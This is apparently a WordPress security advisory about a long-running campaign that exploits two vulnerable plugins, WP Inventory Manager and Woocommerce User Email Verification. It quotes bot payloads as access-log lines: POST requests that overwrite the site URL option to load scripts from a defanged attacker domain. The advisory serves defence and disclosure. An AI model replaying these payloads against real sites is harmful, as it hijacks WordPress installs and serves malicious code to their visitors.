We continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.
Plugins Added to the Attack
- Download WP Inventory Manager (version <= 1.8.2)
- Woocommerce User Email Verification. (version <= 3.3.0 **Still Not Fixed**)
Attackers are trying to exploit vulnerable versions of these plugins. Public exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.
Payloads Used by Bots
- Download WP Inventory Manager
22.214.171.124 - action=save&siteurl=hxxps%3A%2F%2Fcdn.deliverymoretimes[.]info%2Fcdn.js%3Fty%3D1%26 [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php?page=wpim_manage_settings HTTP/1.1" 200 5 "-" "-"
- Woocommerce User Email Verification
126.96.36.199 - wuev_form_type=siteurl&hxxps://cdn.deliverymoretimes[.]info/simpletype.js?ty=1& [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 200 5 "-" "-"
Malicious Domains Injected So far
As always, we recommend adding a WAF as a second layer of protection. If you are using the plugin Woocommerce User Email Verification, it should be removed since the developer hasn’t fixed the “arbitrary options update”.